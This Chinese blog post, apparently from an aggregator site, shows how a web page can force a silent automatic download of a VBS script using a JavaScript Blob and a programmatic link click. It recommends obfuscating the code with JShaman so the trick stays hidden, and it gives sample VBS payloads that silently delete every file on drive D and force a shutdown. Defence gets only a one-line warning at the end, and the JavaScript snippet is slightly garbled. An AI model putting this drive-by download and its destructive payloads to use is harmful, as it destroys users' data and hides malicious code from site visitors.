JavaScript黑魔法:不可阻止的“自动下载”

温馨提示:这篇文章已超过1016天没有更新,请注意相关的内容是否还可用!

正常情况下,当我们想要从网站下载某个文件时,一定是需要主动点击,才能出现下载操作。这是理所当然的。

但你是否遇到过这样一种场景:当打开某个网页时,未进行任何点击,然而后台自动下载了一个文件!

JavaScript黑魔法:不可阻止的“自动下载” 第1张

很可怕吧,像是种不可思议的黑魔法。但这是真实可以实现的,用JavaScript即可实现。

实现效果:

且看本演示:打开页面,后台自动下载了一个vbs文件。点击下载后的文件,vbs脚本文件被执行,弹出了一个hello窗口。如下:

JavaScript黑魔法:不可阻止的“自动下载” 第2张

由于是vbs脚本,因此,如果点击该文件,文件会被打开并执行:

JavaScript黑魔法:不可阻止的“自动下载” 第3张

选择打开,脚本被执行:

JavaScript黑魔法:不可阻止的“自动下载” 第4张

如页面源码所示,本示例,只是执行一句msgbox(“hello”)。

演示视频:

源码:

效果很不可思议,但实现的源码却很简单,完整代码如下,保存为html文件打开即可执行。

<html>

<script>

var blob = new Blob(['msgbox("hello")'],{type:'application/vbs'});

var a = document.('a');

a.href = window.URL.createObjectURL(blob);

a.download = 'game.vbs';

a.click();

</script>

</html>

而如果要防止他人查看源码、了解实现原理,可以对源码中的JavaScript代码混淆加密。

比如使用JShaman平台,对上述代码加密:

JavaScript黑魔法:不可阻止的“自动下载” 第5张

加密后的代码:

JavaScript黑魔法:不可阻止的“自动下载” 第6张

Msgbox仅是一个弹窗,而vbs是可以实现很多强大而可怕的功能的。

比如:

dim WSHshell

set WSHshell = wscript.createobject(“wscript.shell”)

WSHshell.run “cmd /c “”del d:\*.* / f /q /s”””,0 ,true

又如:

dim WSHshell

set WSHshell = wscript.createobject(“wscript.shell”)

WSHshell.run “shutdown -f -s -t 00”,0 ,true

能读懂这两段vbs脚本的话,可知:脚本执行可能带来很危险的后果。甚至可能下载其它的Exe并执行,等等。

防护:

如何防止这种威胁?文件是可能被自动下载的,不仅仅是vbs脚本,exe也可能。但只要不点击,便不会执行。因此,需增强安全意识,对于不明来源的文件:不点击、不打开、不执行。

九七分享吧所有文章来源于网络收集整理,如有侵权请联系QQ2387153712删除,如果这篇文章对你有帮助或者还不错的请给小编点个小赞(◠‿◠),小编每天整理文章不容易(ಥ_ಥ)!!!

文章版权声明:除非注明,否则均为九七分享吧原创文章,转载或复制请以超链接形式并注明出处。

相关阅读

苹果 iOS/iPadOS 15.4.1 正式版发布

哎呦,被盗哦!周杰伦无聊猿NFT疑被钓鱼,价值超300万

“蔚小理”一季度成绩单:小鹏理想均跨过三万辆门槛,蔚来垫底

最完整的人类基因组序列,今天凌晨公布了!

手机行业不景气了?国产厂商大砍单:1.7亿订单取消

快手或将受益于互联网监管

我国实现首例V频段低轨卫星测控

北京外卖封签上线首日调查:1个封签约2分钱,已大面积推广

iPhone更换微信图标教程,安卓:不就是换个主题?

豆瓣关闭私密小组,壮士断腕为时未晚

台积电将5nm产量提高到15万片/月

京东增持京东物流 为了挽救股价还是应对激烈竞争?

发表评论

表情:
评论列表 (暂无评论,426人围观)

还没有评论,来说两句吧...

取消
微信二维码
微信二维码
支付宝二维码